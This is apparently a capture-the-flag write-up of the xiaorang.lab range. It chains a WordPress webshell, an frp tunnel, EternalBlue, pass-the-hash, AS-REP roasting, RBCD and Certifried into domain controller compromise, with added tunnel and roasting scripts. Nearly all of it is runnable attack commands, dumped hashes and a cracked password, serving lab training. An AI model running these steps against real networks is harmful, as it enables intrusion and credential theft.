First, scan the target with fscan:
D:\ONE-FOX集成工具箱_V8.2公开版_by狐狸\gui_scan\fscan>fscan.exe -h 39.99.229.232
Fscan Version: 2.0.0
[2025-04-15 20:44:35] [INFO] Brute-force threads: 1
[2025-04-15 20:44:35] [INFO] Starting information scan
[2025-04-15 20:44:35] [INFO] Final valid host count: 1
[2025-04-15 20:44:35] [INFO] Starting host scan
[2025-04-15 20:44:35] [INFO] Valid port count: 233
[2025-04-15 20:44:35] [SUCCESS] Port open 39.99.229.232:22
[2025-04-15 20:44:35] [SUCCESS] Port open 39.99.229.232:80
[2025-04-15 20:44:35] [SUCCESS] Service identified 39.99.229.232:22 => [ssh] Version:8.2p1 Ubuntu 4ubuntu0.5 Product:OpenSSH OS:Linux Info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-15 20:44:40] [SUCCESS] Service identified 39.99.229.232:80 => [http]
[2025-04-15 20:44:45] [INFO] Live ports: 2
[2025-04-15 20:44:45] [INFO] Starting vulnerability scan
[2025-04-15 20:44:45] [INFO] Loaded plugins: ssh, webpoc, webtitle
[2025-04-15 20:44:45] [SUCCESS] Site title http://39.99.229.232 Status:200 Length:39988 Title:XIAORANG.LAB
[2025-04-15 20:45:02] [SUCCESS] Scan complete: 3/3
Only SSH and HTTP, nothing obvious, so run a directory scan against the web root (the output below is dirsearch):
[20:45:31] Starting:
[20:45:36] 403 - 278B - /.ht_wsr.txt
[20:45:36] 403 - 278B - /.htaccess.save
[20:45:36] 403 - 278B - /.htaccessBAK
[20:45:36] 403 - 278B - /.htaccess.orig
[20:45:36] 403 - 278B - /.html
[20:45:36] 403 - 278B - /.htaccess_extra
[20:45:36] 403 - 278B - /.htm
[20:45:36] 403 - 278B - /.htaccess.bak1
[20:45:36] 403 - 278B - /.htaccessOLD2
[20:45:36] 403 - 278B - /.htaccessOLD
[20:45:36] 403 - 278B - /.htaccess.sample
[20:45:36] 403 - 278B - /.htaccess_orig
[20:45:36] 403 - 278B - /.htaccess_sc
[20:45:36] 403 - 278B - /.htpasswd_test
[20:45:36] 403 - 278B - /.htpasswds
[20:45:36] 403 - 278B - /.httr-oauth
[20:45:37] 403 - 278B - /.php
[20:45:59] 301 - 0B - /index.php -> http://39.99.229.232/
[20:46:00] 404 - 35KB - /index.php/login/
[20:46:01] 200 - 7KB - /license.txt
[20:46:08] 200 - 3KB - /readme.html
[20:46:09] 403 - 278B - /server-status
[20:46:09] 403 - 278B - /server-status/
[20:46:18] 301 - 317B - /wp-admin -> http://39.99.229.232/wp-admin/
[20:46:18] 200 - 513B - /wp-admin/install.php
[20:46:18] 409 - 3KB - /wp-admin/setup-config.php
[20:46:18] 400 - 1B - /wp-admin/admin-ajax.php
[20:46:18] 302 - 0B - /wp-admin/ -> http://39.99.229.232/wp-login.php?redirect_to=http%3A%2F%2F39.99.229.232%2Fwp-admin%2F&reauth=1
[20:46:18] 200 - 0B - /wp-config.php
[20:46:18] 200 - 0B - /wp-content/
[20:46:18] 301 - 319B - /wp-content -> http://39.99.229.232/wp-content/
[20:46:18] 200 - 477B - /wp-content/uploads/
[20:46:18] 200 - 416B - /wp-content/upgrade/
[20:46:18] 200 - 84B - /wp-content/plugins/akismet/akismet.php
[20:46:18] 500 - 0B - /wp-content/plugins/hello.php
[20:46:18] 200 - 0B - /wp-includes/rss-functions.php
[20:46:18] 301 - 320B - /wp-includes -> http://39.99.229.232/wp-includes/
[20:46:18] 200 - 2KB - /wp-login.php
[20:46:18] 200 - 0B - /wp-cron.php
[20:46:18] 200 - 5KB - /wp-includes/
[20:46:18] 302 - 0B - /wp-signup.php -> http://39.99.229.232/wp-login.php?action=register
[20:46:18] 405 - 42B - /xmlrpc.php
This is clearly WordPress (wp-admin, wp-login.php, wp-content, xmlrpc.php).
flag1
A quick manual check found a weak password (a login brute-force would also have worked): admin:123456. After logging in, write a webshell into a theme file via the theme editor (Appearance > Theme File Editor).

Connect to the webshell with AntSword at:
http://39.99.159.217//wp-content/themes/twentytwentyone/header.php

Upload fscan through the webshell and scan the internal 172.22.15.0/24 segment:

[2025-04-15 21:02:45] [SUCCESS] Target 172.22.15.35 alive (ICMP)
[2025-04-15 21:02:45] [SUCCESS] Target 172.22.15.26 alive (ICMP)
[2025-04-15 21:02:46] [SUCCESS] Target 172.22.15.13 alive (ICMP)
[2025-04-15 21:02:46] [SUCCESS] Target 172.22.15.18 alive (ICMP)
[2025-04-15 21:02:46] [SUCCESS] Target 172.22.15.24 alive (ICMP)
[2025-04-15 21:02:51] [INFO] Live hosts: 5
[2025-04-15 21:02:51] [INFO] Valid port count: 233
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.26:80
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.26:22
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.18:80
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.24:80
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.13:88
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.24:135
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.13:135
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.35:135
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.18:139
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.13:139
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.35:139
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.18:135
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.24:139
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.13:389
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.18:445
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.35:445
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.13:445
[2025-04-15 21:02:52] [SUCCESS] Port open 172.22.15.24:445
[2025-04-15 21:02:52] [SUCCESS] Service identified 172.22.15.26:22 => [ssh] Version:8.2p1 Ubuntu 4ubuntu0.5 Product:OpenSSH OS:Linux Info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-15 21:02:57] [SUCCESS] Service identified 172.22.15.26:80 => [http]
[2025-04-15 21:02:57] [SUCCESS] Service identified 172.22.15.13:88 =>
[2025-04-15 21:02:57] [SUCCESS] Service identified 172.22.15.18:80 => [http]
[2025-04-15 21:02:57] [SUCCESS] Service identified 172.22.15.18:139 => Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] Service identified 172.22.15.24:80 => [http]
[2025-04-15 21:02:57] [SUCCESS] Service identified 172.22.15.13:139 => Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] Service identified 172.22.15.35:139 => Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] Service identified 172.22.15.24:139 => Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] Service identified 172.22.15.13:389 => [ldap] Product:Microsoft Windows Active Directory LDAP OS:Windows Info:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-15 21:02:57] [SUCCESS] Service identified 172.22.15.18:445 =>
[2025-04-15 21:02:57] [SUCCESS] Service identified 172.22.15.35:445 =>
[2025-04-15 21:02:57] [SUCCESS] Service identified 172.22.15.13:445 =>
[2025-04-15 21:02:57] [SUCCESS] Service identified 172.22.15.24:445 =>
[2025-04-15 21:02:58] [SUCCESS] Port open 172.22.15.24:3306
[2025-04-15 21:03:02] [SUCCESS] Service identified 172.22.15.24:3306 => [mysql] Version:5.7.26 Product:MySQL Banner:[J.5.7.26.b.H.32...v 2A` 5\@r mysql_native_password]
[2025-04-15 21:03:57] [SUCCESS] Service identified 172.22.15.24:135 =>
[2025-04-15 21:03:57] [SUCCESS] Service identified 172.22.15.13:135 =>
[2025-04-15 21:03:57] [SUCCESS] Service identified 172.22.15.35:135 =>
[2025-04-15 21:03:57] [SUCCESS] Service identified 172.22.15.18:135 =>
[2025-04-15 21:03:57] [INFO] Live ports: 19
[2025-04-15 21:03:57] [INFO] Starting vulnerability scan
[2025-04-15 21:03:57] [INFO] Loaded plugins: findnet, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-15 21:03:57] [SUCCESS] NetInfo scan result
Target host: 172.22.15.18
Hostname: XR-CA
Discovered network interfaces:
IPv4 addresses:
└─ 172.22.15.18
[2025-04-15 21:03:57] [SUCCESS] NetInfo scan result
Target host: 172.22.15.13
Hostname: XR-DC01
Discovered network interfaces:
IPv4 addresses:
└─ 172.22.15.13
[2025-04-15 21:03:57] [SUCCESS] NetInfo scan result
Target host: 172.22.15.24
Hostname: XR-WIN08
Discovered network interfaces:
IPv4 addresses:
└─ 172.22.15.24
[2025-04-15 21:03:57] [SUCCESS] NetInfo scan result
Target host: 172.22.15.35
Hostname: XR-0687
Discovered network interfaces:
IPv4 addresses:
└─ 172.22.15.35
[2025-04-15 21:03:57] [INFO] OS info 172.22.15.13 [Windows Server 2016 Standard 14393]
[2025-04-15 21:03:57] [SUCCESS] Vulnerability found 172.22.15.24 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010
[2025-04-15 21:03:57] [SUCCESS] Site title http://172.22.15.24 Status:302 Length:0 Title:(none) Redirect: http://172.22.15.24/www
[2025-04-15 21:03:57] [SUCCESS] Site title http://172.22.15.18 Status:200 Length:703 Title:IIS Windows Server
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.35 XIAORANG\XR-0687
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.13 DC:XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393
[2025-04-15 21:03:57] [SUCCESS] Site title http://172.22.15.26 Status:200 Length:39962 Title:XIAORANG.LAB
[2025-04-15 21:03:58] [SUCCESS] Target: http://172.22.15.18:80
Vuln type: poc-yaml-active-directory-certsrv-detect
Vuln name:
Details:
author:AgeloVito
links:https://www.cnblogs.com/EasonJim/p/6859345.html
[2025-04-15 21:03:58] [SUCCESS] Site title http://172.22.15.24/www/sys/index.php Status:200 Length:135 Title:(none)
[2025-04-15 21:04:22] [SUCCESS] Scan complete: 35/35
Pulling the results together:
172.22.15.26  the WordPress host we already control (Ubuntu, SSH + HTTP)
172.22.15.13  XR-DC01   domain controller for xiaorang.lab (Windows Server 2016; Kerberos 88, LDAP 389)
172.22.15.18  XR-CA     certificate server (IIS, ADCS certsrv detected)
172.22.15.24  XR-WIN08  Windows Server 2008 R2 in WORKGROUP, vulnerable to MS17-010; MySQL 5.7.26 and a web app under /www
172.22.15.35  XR-0687   domain member (XIAORANG\XR-0687)
All of this needs a tunnel into 172.22.15.0/24 (this step took a good while to get right); an older frp release worked straight away.
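The writeup does not show its frp configuration. As an added example (not the author's config), the script below emits the two ini files an ini-config frp release needs for a reverse SOCKS5 tunnel, plus the matching proxychains entry. It assumes a placeholder VPS address (203.0.113.10, TEST-NET-3), control port 7000, and SOCKS port 6000 (6000 is the port that shows up in the proxychains output later in the writeup); the token and SOCKS credentials are placeholders to be replaced.

```bash
#!/usr/bin/env bash
# Reverse SOCKS5 tunnel with an ini-config frp release, plus the proxychains entry.
# Added example, not the writeup's own config. Assumptions: VPS_IP is the attacker's
# public host (placeholder), frps/frpc binaries are already on the VPS and the foothold.
set -eu

VPS_IP="${VPS_IP:-203.0.113.10}"           # placeholder (TEST-NET-3): replace with your VPS
FRP_PORT="${FRP_PORT:-7000}"               # frps control port
SOCKS_PORT="${SOCKS_PORT:-6000}"           # SOCKS5 listener exposed on the VPS
TOKEN="${TOKEN:-change-me}"                # shared secret: without it anyone can register proxies on frps
SOCKS_USER="${SOCKS_USER:-tunnel}"
SOCKS_PASS="${SOCKS_PASS:-change-me-too}"  # the SOCKS port faces the internet; never leave it open

# Server side, on the VPS:   ./frps -c frps.ini
frps_ini() {
    cat <<EOF
[common]
bind_port = ${FRP_PORT}
token = ${TOKEN}
EOF
}

# Client side, on the foothold 172.22.15.26 (started through the webshell):   ./frpc -c frpc.ini
# frp's built-in socks5 plugin makes frpc itself the SOCKS server, so nothing else is uploaded.
frpc_ini() {
    cat <<EOF
[common]
server_addr = ${VPS_IP}
server_port = ${FRP_PORT}
token = ${TOKEN}

[socks5]
type = tcp
remote_port = ${SOCKS_PORT}
plugin = socks5
plugin_user = ${SOCKS_USER}
plugin_passwd = ${SOCKS_PASS}
EOF
}

# Entry for the [ProxyList] section of /etc/proxychains4.conf on the attacking box.
# proxychains-ng syntax: "socks5 host port [user pass]".
proxychains_line() {
    printf 'socks5 %s %s %s %s\n' "$VPS_IP" "$SOCKS_PORT" "$SOCKS_USER" "$SOCKS_PASS"
}

# Sanity check once frpc is running: the DC's Kerberos port should answer through the chain.
check_tunnel() {
    proxychains4 -q nc -zv -w 3 172.22.15.13 88
}

if [ "${1:-}" = "--write" ]; then
    frps_ini > frps.ini
    frpc_ini > frpc.ini
    printf 'add to [ProxyList] in /etc/proxychains4.conf:\n%s' "$(proxychains_line)"
fi
```

Everything later in the writeup (msfconsole, psexec, GetNPUsers, certipy) is run under `proxychains4`, so this one SOCKS5 proxy is the only path into the lab; it is worth confirming with `check_tunnel` before spending time debugging tool errors.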
flag2
Exploit EternalBlue (MS17-010) on 172.22.15.24. Through a SOCKS tunnel only connections initiated by the attacker reach the target, so the payload has to be a bind shell (bind_tcp) rather than a reverse one:
proxychains4 msfconsole
search MS17-010 blue
use 0
or directly
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.15.24
run
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Going further in msf here was fiddly, which I think is because this is not the pro version; using psexec directly is enough. In practice line 644 of psexec.py needed a small tweak. Pass the Administrator NT hash from hashdump:
proxychains4 python3 psexec.py administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk


flag3
Browse to the web app on 172.22.15.24 (/www) through the SOCKS proxy; the login is again the weak password admin:123456.

Export the data from the application.

Export the template, then tidy the domain usernames into a list:
lixiuying@xiaorang.lab
lixiaoliang@xiaorang.lab
zhangyi@xiaorang.lab
jiaxiaoliang@xiaorang.lab
zhangli@xiaorang.lab
zhangwei@xiaorang.lab
liuqiang@xiaorang.lab
wangfang@xiaorang.lab
wangwei@xiaorang.lab
wanglihong@xiaorang.lab
huachunmei@xiaorang.lab
wanghao@xiaorang.lab
zhangxinyu@xiaorang.lab
huzhigang@xiaorang.lab
lihongxia@xiaorang.lab
wangyulan@xiaorang.lab
chenjianhua@xiaorang.lab
Looking at it, this is an AS-REP Roasting scenario: ask the KDC for an AS-REP for each name without pre-authentication, and any account with "Do not require Kerberos preauthentication" set hands back material that can be cracked offline.
proxychains4 impacket-GetNPUsers -dc-ip 172.22.15.13 -usersfile username.txt xiaorang.lab/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:40fc9781df5b246f5b3cd4e8b6110d79$910cc853cbcc73e71332fa64924a9a5901f5af16726c2b1fab1984bcf6f7214fd9ba4fa2cfe23e11bc4951f5996839ad080d0405ee1e6d903a90b5548616659c86969a99da96a7b4f1a617e9c85257a8836fbc0e83a6771c51172af7e395b5adcec1d15be4aab915a37fa1f160c6b1e973a11de041cd223753b8f4630ffad44c961562fcfcc65e35ae108425a3668eb48498feb61ac62edf82e10f4df3e9ce0b7e606d8d001fb4c3cdd66701aa577eb6b2f09ef691af8181c9ca16d5d4c1ec3a286c79ee28a845b1640fd52428511d8247eb9da96b03ae287405eb7d2508c8cc357463bb1eb70fb8714e3807
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
(the same KDC_ERR_C_PRINCIPAL_UNKNOWN line is printed for 8 more of the names)
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:32d6ed87b8e874e386a028e86f3a3384$cc7e7580cfa37c6aac86218fc4d7a07632872b25e008b94c859702f99fb79852b4590a9cefa7aefb93065fd9f3f9b0ffee6fc41a1cbd4bde02e97d3d4fc0a8f806a8959a1f13763e964c0ec19a33f3c47e7656411db163fb3a7c5ffab6e291cbd05c6403335c84370005da10ac29ca5038dbef19f3884c3017978fabe2b83ddf36438b306c71ff1908a58efc6bd827538c32521ade17adae3ad3e114cfe726368e8854576e010cc493899d426e1e842a72db5f7608350674874c3b7990802c9abb5055e785635b6c41ea946f43b0de3724d4b977ac28aee8502e7c6a80e3e9b9ed28a68db218cf81835f7398
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
(the same line is printed for 2 more of the names)
[-] User lihongxia@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wangyulan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User chenjianhua@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
Three kinds of result come out of the 17 names: 12 do not exist in the domain (KDC_ERR_C_PRINCIPAL_UNKNOWN, so the KDC doubles as a username-enumeration oracle), 3 exist but require pre-authentication, and 2 (lixiuying and huachunmei) have pre-authentication disabled and return AS-REP hashes that can be cracked offline:
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:40fc9781df5b246f5b3cd4e8b6110d79$910cc853cbcc73e71332fa64924a9a5901f5af16726c2b1fab1984bcf6f7214fd9ba4fa2cfe23e11bc4951f5996839ad080d0405ee1e6d903a90b5548616659c86969a99da96a7b4f1a617e9c85257a8836fbc0e83a6771c51172af7e395b5adcec1d15be4aab915a37fa1f160c6b1e973a11de041cd223753b8f4630ffad44c961562fcfcc65e35ae108425a3668eb48498feb61ac62edf82e10f4df3e9ce0b7e606d8d001fb4c3cdd66701aa577eb6b2f09ef691af8181c9ca16d5d4c1ec3a286c79ee28a845b1640fd52428511d8247eb9da96b03ae287405eb7d2508c8cc357463bb1eb70fb8714e3807
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:32d6ed87b8e874e386a028e86f3a3384$cc7e7580cfa37c6aac86218fc4d7a07632872b25e008b94c859702f99fb79852b4590a9cefa7aefb93065fd9f3f9b0ffee6fc41a1cbd4bde02e97d3d4fc0a8f806a8959a1f13763e964c0ec19a33f3c47e7656411db163fb3a7c5ffab6e291cbd05c6403335c84370005da10ac29ca5038dbef19f3884c3017978fabe2b83ddf36438b306c71ff1908a58efc6bd827538c32521ade17adae3ad3e114cfe726368e8854576e010cc493899d426e1e842a72db5f7608350674874c3b7990802c9abb5055e785635b6c41ea946f43b0de3724d4b977ac28aee8502e7c6a80e3e9b9ed28a68db218cf81835f7398
Crack them with hashcat (mode 18200, Kerberos 5 AS-REP etype 23):
hashcat -m 18200 --force '$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:40fc9781df5b246f5b3cd4e8b6110d79$910cc853cbcc73e71332fa64924a9a5901f5af16726c2b1fab1984bcf6f7214fd9ba4fa2cfe23e11bc4951f5996839ad080d0405ee1e6d903a90b5548616659c86969a99da96a7b4f1a617e9c85257a8836fbc0e83a6771c51172af7e395b5adcec1d15be4aab915a37fa1f160c6b1e973a11de041cd223753b8f4630ffad44c961562fcfcc65e35ae108425a3668eb48498feb61ac62edf82e10f4df3e9ce0b7e606d8d001fb4c3cdd66701aa577eb6b2f09ef691af8181c9ca16d5d4c1ec3a286c79ee28a845b1640fd52428511d8247eb9da96b03ae287405eb7d2508c8cc357463bb1eb70fb8714e3807' /usr/share/wordlists/rockyou.txt
hashcat -m 18200 --force '$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:32d6ed87b8e874e386a028e86f3a3384$cc7e7580cfa37c6aac86218fc4d7a07632872b25e008b94c859702f99fb79852b4590a9cefa7aefb93065fd9f3f9b0ffee6fc41a1cbd4bde02e97d3d4fc0a8f806a8959a1f13763e964c0ec19a33f3c47e7656411db163fb3a7c5ffab6e291cbd05c6403335c84370005da10ac29ca5038dbef19f3884c3017978fabe2b83ddf36438b306c71ff1908a58efc6bd827538c32521ade17adae3ad3e114cfe726368e8854576e010cc493899d426e1e842a72db5f7608350674874c3b7990802c9abb5055e785635b6c41ea946f43b0de3724d4b977ac28aee8502e7c6a80e3e9b9ed28a68db218cf81835f7398' /usr/share/wordlists/rockyou.txt
Both hashes crack against rockyou; lixiuying's password (winniethepooh) is used from here on.
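The steps above (tidying the exported names into a usersfile, running GetNPUsers, copying the `$krb5asrep$` lines into hashcat by hand) are what a practitioner scripts on every engagement. The helper below is an added example, not the writeup's own tooling: it normalises the exported names, runs GetNPUsers with its `-format hashcat -outputfile` options so the hashes land in a file, and then classifies every name into roastable / exists-but-pre-auth-required / not-in-domain, which is the username-enumeration result the KDC errors give for free. The run path assumes impacket, hashcat and proxychains4 on PATH and a working SOCKS tunnel; the checks use a constructed sample log modelled on the output above.

```bash
#!/usr/bin/env bash
# AS-REP roasting helper: added example, not code from the original writeup.
# Assumptions: impacket-GetNPUsers, hashcat and proxychains4 on PATH; SOCKS tunnel already up.
set -eu

DOMAIN="${DOMAIN:-xiaorang.lab}"
DC_IP="${DC_IP:-172.22.15.13}"

# Turn the names exported from the web app (one per line, any case, with or without an
# @domain suffix, possibly padded with whitespace) into a clean usersfile for GetNPUsers.
build_usersfile() {
    sed -e 's/[[:space:]]//g' -e 's/@.*$//' "$1" | tr '[:upper:]' '[:lower:]' | grep -v '^$' | sort -u
}

# Run GetNPUsers; hashcat-ready hashes go to $2, the full log to $3 (not run by the offline checks).
roast() {
    proxychains4 -q impacket-GetNPUsers "${DOMAIN}/" -dc-ip "$DC_IP" \
        -usersfile "$1" -format hashcat -outputfile "$2" 2>&1 | tee "$3"
}

# Accounts whose AS-REP came back: pre-authentication is disabled on them.
roastable_users() {
    grep -o '\$krb5asrep\$23\$[^@:]*' "$1" | sed 's/.*\$//' | sort -u
}

# Accounts that exist but require pre-auth (GetNPUsers names them explicitly).
preauth_users() {
    grep -o "User [^ ]* doesn't have UF_DONT_REQUIRE_PREAUTH" "$1" | awk '{print $2}' | sed 's/@.*//' | sort -u
}

# Everything else in the usersfile got KDC_ERR_C_PRINCIPAL_UNKNOWN, i.e. the account does not
# exist. The KDC is an enumeration oracle, so the negative list is worth keeping as well.
unknown_users() {
    users="$1"; log="$2"
    named=$(mktemp)
    { roastable_users "$log"; preauth_users "$log"; } | sort -u > "$named"
    sort -u "$users" | comm -23 - "$named"
    rm -f "$named"
}

# Pull the hashes out of a raw log when -outputfile was not used.
extract_hashes() {
    grep -o '\$krb5asrep\$23\$[^[:space:]]*' "$1"
}

# Offline crack; 18200 = Kerberos 5 AS-REP etype 23. Not run by the offline checks.
crack() {
    hashcat -m 18200 "$1" /usr/share/wordlists/rockyou.txt
    hashcat -m 18200 "$1" --show
}

if [ "${1:-}" = "--run" ]; then
    build_usersfile "$2" > users.txt
    roast users.txt asrep.hashes roast.log
    printf 'roastable (pre-auth disabled): %s\n' "$(roastable_users roast.log | tr '\n' ' ')"
    printf 'exist, pre-auth required:      %s\n' "$(preauth_users roast.log | tr '\n' ' ')"
    printf 'not in domain:                 %s\n' "$(unknown_users users.txt roast.log | tr '\n' ' ')"
    crack asrep.hashes
fi
```

Usage: `./asrep.sh --run exported-names.txt`. Stripping the `@xiaorang.lab` suffix before the request also keeps the hash lines in the plain `user@REALM` form; hashcat accepts the doubled `user@xiaorang.lab@XIAORANG.LAB` form seen above, but it is easier to read and to match back to the user list without it.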
Collect domain data with the BloodHound Python collector using the cracked credentials:
proxychains4 bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp
Import the zip into BloodHound: lixiuying has GenericWrite over the computer XR-0687, which allows writing its msDS-AllowedToActOnBehalfOfOtherIdentity attribute, i.e. resource-based constrained delegation (RBCD). We need a computer account we control to delegate from; creating one requires ms-DS-MachineAccountQuota to be above 0 (the default is 10). Then a service ticket for Administrator to cifs/XR-0687 is obtained via S4U2self + S4U2proxy, and psexec uses it from the ccache:
proxychains4 impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'HACK$' -computer-pass 'orange@admin'
proxychains4 impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'HACK$'
proxychains4 impacket-getST xiaorang.lab/'HACK$':'orange@admin' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
export KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache
proxychains4 impacket-psexec administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13


flag4
Next is ADCS; the intended path is CVE-2022-26923 (Certifried). A user who can create a machine account sets its dNSHostName to the DC's name; an unpatched CA then issues a Machine-template certificate that identifies the DC. Create the machine account and request the certificate (certipy names the resulting pfx after the identity in the certificate, hence xr-dc01.pfx below):
proxychains4 certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -user Test2 -pass Test1234 -dns 'XR-DC01.xiaorang.lab'
proxychains4 certipy-ad req -u Test2\$@xiaorang.lab -p Test1234 -target 172.22.15.18 -ca "xiaorang-XR-CA-CA" -template Machine
The next step uses the PassTheCert Python script (AlmondOffSec/PassTheCert). It authenticates to LDAPS with the certificate over Schannel instead of using PKINIT, so it works when the KDC has no certificate and `certipy auth` fails with KDC_ERR_PADATA_TYPE_NOSUPP. Split the pfx into certificate and key, confirm with the whoami action that LDAP sees us as the DC machine account, then write the DC's RBCD attribute so that the HACK$ account created earlier may delegate to it (clean up afterwards with certipy-ad account delete and impacket-rbcd -action remove):
certipy-ad cert -pfx xr-dc01.pfx -nokey -out user.crt
certipy-ad cert -pfx xr-dc01.pfx -nocert -out user.key
proxychains4 python passthecert.py -action whoami -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13
proxychains4 python passthecert.py -action write_rbcd -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'HACK$'


Request a service ticket for Administrator to cifs/XR-DC01 and point KRB5CCNAME at it:
proxychains4 impacket-getST xiaorang.lab/HACK\$:orange@admin -dc-ip 172.22.15.13 -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator
export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache
psexec onto the DC with the Kerberos ticket, no password:
proxychains4 impacket-psexec xiaorang.lab/Administrator@xr-dc01.xiaorang.lab -k -no-pass -target-ip 172.22.15.13 -codec gbk
